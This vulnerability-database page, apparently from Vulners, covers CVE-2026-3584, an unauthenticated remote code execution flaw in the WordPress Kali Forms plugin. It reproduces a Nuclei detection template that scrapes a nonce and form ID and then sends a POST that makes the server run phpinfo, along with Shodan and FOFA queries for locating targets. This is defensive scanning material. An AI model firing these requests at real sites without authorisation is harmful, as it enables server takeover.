| Reporter | Title | Published | Views | Family All 16 |
|---|---|---|---|---|
| CVE-2026-3584 | 20 Mar 202621:25 | – | attackerkb | |
| CVE-2026-3584 | 20 Mar 202622:17 | – | circl | |
| WordPress plugin Kali Forms 代码注入漏洞 | 20 Mar 202600:00 | – | cnnvd | |
| CVE-2026-3584 | 20 Mar 202621:25 | – | cve | |
| CVE-2026-3584 Kali Forms <= 2.4.9 - Unauthenticated Remote Code Execution via form_process | 20 Mar 202621:25 | – | cvelist | |
| EUVD-2026-13814 | 21 Mar 202600:31 | – | euvd | |
| Exploit for CVE-2026-3584 | 25 Mar 202609:21 | – | githubexploit | |
| CVE-2026-3584 | 20 Mar 202622:16 | – | nvd | |
| 📄 WordPress Kali Forms 2.4.9 Remote Code Execution | 20 Apr 202600:00 | – | packetstorm | |
| WordPress Kali Forms plugin <= 2.4.9 - Unauthenticated Remote Code Execution via form_process vulnerability | 23 Mar 202610:14 | – | patchstack |
id: CVE-2026-3584
info:
name: WordPress Kali Forms <= 2.4.9 - Remote Code Execution
author: pussycat0x
severity: critical
description: |
Kali Forms WordPress plugin <= 2.4.9 contains a remote code execution caused by unsafe user input handling in 'form_process' and 'prepare_post_data' functions, letting unauthenticated attackers execute code on the server, exploit requires no authentication.
impact: |
Unauthenticated attackers can execute arbitrary code on the server, potentially leading to full system compromise.
remediation: |
Update to the latest version beyond 2.4.9.
reference:
- https://wordpress.org/plugins/kali-forms/
- https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/kali-forms/kali-forms-249-unauthenticated-remote-code-execution-via-form-process
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2026-3584
epss-score: 0.07239
epss-percentile: 0.93576
cwe-id: CWE-94
metadata:
verified: true
max-request: 6
product: kali-forms
framework: wordpress
fofa-query: body="kali-forms"
shodan-query: http.component:"WordPress" http.html:"kali-forms"
tags: cve,cve2026,wordpress,wp-plugin,kali-forms,rce,unauth,vkev
flow: |
var paths = ["/contact-us/", "/contact/", "/form/", "/feedback/", "/"];
for (var i = 0; i < paths.length; i++) {
set("form_path", paths[i]);
if (http(1)) {
http(2);
break;
}
}
http:
- raw:
- |
GET {{form_path}} HTTP/1.1
Host: {{Hostname}}
redirects: true
max-redirects: 3
matchers:
- type: dsl
dsl:
- 'status_code == 200'
- 'contains(body, "KaliFormsObject")'
- 'contains(body, "ajax_nonce")'
condition: and
internal: true
extractors:
- type: regex
name: nonce
part: body
group: 1
regex:
- 'ajax_nonce":"([a-f0-9]+)"'
internal: true
- type: regex
name: form_id
part: body
group: 1
regex:
- 'data-form-id="(\d+)"'
internal: true
- type: regex
name: version
part: body
group: 1
regex:
- 'kali-forms/[^"]*(?:js|css)\?ver=([0-9.]+)'
internal: true
- raw:
- |
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
action=kaliforms_form_process&data[nonce]={{nonce}}&data[formId]={{form_id}}&data[first-name]=test&data[last-name]=user&data[email]=test%40example.com&data[message]=test&data[thisPermalink]=phpinfo
matchers-condition: and
matchers:
- type: word
part: body
words:
- "phpinfo()</title>"
- "PHP Extension"
- "PHP Version"
condition: and
- type: status
status:
- 200
extractors:
- type: regex
name: php_version
part: body
group: 1
regex:
- 'PHP Version ([0-9.]+)'
# digest: 4a0a0047304502203aa00f646a9b307da9caff214477aa98aa26f0e7754a75e5f33e4b294bfce6dc022100a8aa349dd63d13f38c57e38056c79a58870880d00aa2cf034fca856865a59c84:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation